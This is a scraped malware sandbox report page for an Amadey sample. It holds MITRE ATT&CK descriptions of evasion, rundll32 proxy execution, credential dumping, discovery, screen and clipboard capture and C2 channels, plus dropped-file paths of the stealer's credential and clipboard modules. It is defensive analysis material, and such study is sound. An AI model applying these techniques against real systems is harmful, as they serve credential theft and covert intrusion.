Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report tOuVwTJrau.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Initial Sample

Dropped Files

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip

C:\Users\user\AppData\Local\Temp\_Files_\DVWHKMNFNN.xlsx

C:\Users\user\AppData\Local\Temp\_Files_\KATAXZVCPS.xlsx

C:\Users\user\AppData\Local\Temp\_Files_\ONBQCLYSPU.docx

C:\Users\user\AppData\Local\Temp\_Files_\UMMBDNEQBN.docx

C:\Users\user\AppData\Local\Temp\_Files_\VLZDGUKUTZ.docx

C:\Users\user\AppData\Local\Temp\_Files_\VLZDGUKUTZ.xlsx

Windows Analysis Report
tOuVwTJrau.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre